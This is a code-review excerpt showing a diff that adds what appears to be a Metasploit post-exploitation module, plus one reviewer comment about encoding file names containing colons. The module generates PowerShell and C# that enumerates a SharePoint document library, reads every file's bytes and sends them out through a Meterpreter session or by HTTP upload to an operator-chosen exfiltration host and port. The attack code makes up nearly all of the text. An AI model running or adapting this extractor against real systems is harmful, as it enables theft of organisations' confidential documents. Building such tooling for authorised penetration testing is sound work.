modules/post/windows/gather/sharepoint_document_extractor.rb

```diff
@@ -0,0 +1,222 @@
+        #{build_dotnet_code}
+        "@ -ReferencedAssemblies "Microsoft.SharePoint.dll","System.Web.dll" -ErrorAction Stop
+        [SharePointExtractor]::ExtractDocs('#{datastore['SITE_URL']}', '#{datastore['LIBRARY']}',
+          '#{datastore['EXFIL_METHOD']}', '#{datastore['EXFIL_HOST']}', #{datastore['EXFIL_PORT']},
+          #{datastore['MAX_SIZE']})
+      } catch {
+        Write-Output "FATAL:AssemblyLoadError:" + $_.Exception.Message
+      }
+    PS
+  end
+
+  def build_dotnet_code
+    <<~CSHARP
+      using Microsoft.SharePoint;
+      using System;
+      using System.IO;
+      using System.Net;
+
+      public class SharePointExtractor {
+        public static void ExtractDocs(string site_url, string library_name, string exfil_method, string exfil_host, int exfil_port, long max_size) {
+          try {
+            using (SPSite site = new SPSite(site_url)) {
+              using (SPWeb web = site.OpenWeb()) {
+                SPList list = get_library(web, library_name);
+                if (list == null) return;
+                #{extract_library_logic}
+              }
+            }
+          } catch (Exception e) {
+            Console.WriteLine("FATAL:GeneralError:" + e.Message);
+          }
+        }
+      }
+    CSHARP
+  end
+
+  def get_library(web, library_name)
+    web.Lists[library_name]
+  rescue StandardError
+    print_error("Library not found: #{library_name}")
+    nil
+  end
+
+  def extract_library_logic
+    <<~CSHARP
+      SPDocumentLibrary library = list as SPDocumentLibrary;
+      if (library == null) {
+        Console.WriteLine("ERROR:NotADocumentLibrary:" + library_name);
+        return;
+      }
+      Console.WriteLine("INFO:Enumerating:" + library_name + ":" + library.Items.Count + " items");
+      foreach (SPListItem item in library.Items) {
+        try {
+          SPFile file = item.File;
+          if (file.Length > max_size) {
+            Console.WriteLine("SKIP:SizeExceeded:" + file.Name + ":" + file.Length);
+            continue;
+          }
+          byte[] file_bytes = file.OpenBinary();
+          string file_name = file.Name;
+          #{exfiltrate_file(file_name: 'file_name', file_bytes: 'file_bytes')}
+        } catch (Exception ex) {
+          Console.WriteLine("ERROR:FileProcessing:" + item.Name + ":" + ex.Message);
+        }
+      }
+    CSHARP
+  end
+
+  def exfiltrate_file(file_name:, file_bytes:)
+    if datastore['EXFIL_METHOD'].upcase == 'HTTP' && !datastore['EXFIL_HOST'].empty?
+      http_exfil(file_name, file_bytes)
+    else
+      meterpreter_exfil(file_name, file_bytes)
+    end
+  end
+
+  def http_exfil(file_name, file_bytes)
+    <<~CSHARP
+      using (WebClient client = new WebClient()) {
+        client.Headers.Add("X-Filename", #{file_name});
+        client.UploadData("http://" + exfil_host + ":" + exfil_port + "/upload", #{file_bytes});
+        Console.WriteLine("SUCCESS:HTTP:" + #{file_name} + ":" + #{file_bytes}.Length);
```

Comment:
File name should be encoded here as well to handle instances where it contains a `:`.